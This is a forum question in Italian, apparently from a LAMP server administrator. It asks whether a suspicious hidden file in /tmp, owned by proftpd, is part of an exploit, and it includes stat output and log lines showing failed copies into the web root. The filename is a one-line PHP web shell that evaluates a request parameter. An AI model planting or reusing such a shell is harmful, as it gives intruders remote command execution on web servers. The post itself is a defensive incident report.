Recentemente ho scoperto un file nascosto in /tmp
di proftpd
che mi preoccupa un po ':
-rw-r--r-- 1 proftpd nogroup <timestamp> 86 .<?php eval($_REQUEST[cmd]); ?>
Ho provato a vedere il suo contenuto in un editor di testo, ma probabilmente si trattava di una brutta mossa poiché modifica l'ultima proprietà del tempo di accesso. Ad ogni modo ecco l'output di stat
:
File: ‘/tmp/.<?php eval($_REQUEST[cmd]);?>’
Size: 86 Blocks: 8 IO Block: 4096 regular file
Device: fc00h/64512d Inode: 175564 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 113/ proftpd) Gid: (65534/ nogroup)
Access: <another-timestamp>
Modify: <one-timestamp>
Change: <one-timestamp>
Birth: -
Il controllo del registro proftpd nel momento in cui il file è stato modificato mi dà un sacco di voci come questa:
<timestamp> <myhost> proftpd[9114] localhost.localdomain (<some-naughy-domain>[<IP>]): error opening destination file '/var/www/public_html/<hosted-domain>/www/dbvar.php' for copying: No such file or directory
Questo file potrebbe essere usato come parte di un exploit?
Sto lavorando in un ambiente server LAMP.